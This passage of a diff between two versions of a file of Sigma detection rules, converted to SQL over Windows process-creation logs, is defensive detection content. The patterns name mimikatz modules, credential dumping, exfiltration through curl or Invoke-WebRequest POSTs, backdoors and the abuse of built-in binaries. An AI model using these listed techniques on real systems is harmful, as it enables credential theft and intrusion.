'%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": 
"a642964e-bead-4bed-8910-1bb4d63e3b4d", - "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "status": "experimental", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.discovery" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the utility by administrators to query the event log" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine 
LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' 
ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR 
CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": 
"proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { 
- "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of dsacls to bind to an LDAP session" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. 
Anhaus, Tony Lambert, oscd.community, omkar72", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "tags": [ + "attack.execution", + "attack.t1047" + ], + "falsepositives": [ + "False positives are expected (e.g. in environments where WinRM is used legitimately)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (SubjectLogonId = '')))" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + }, + { + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1482" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE 
'%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "To be determined" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_esentutl_params.yml" + }, + { + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Legitimate administrative use (Should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' 
ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" + }, + { + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "status": "test", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "status": "experimental", + "description": "Detects the 
removal of a port or application rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate administration activity", + "Software installations and removal" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + }, + { + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": 
"514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Rare intended use of hidden services" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND 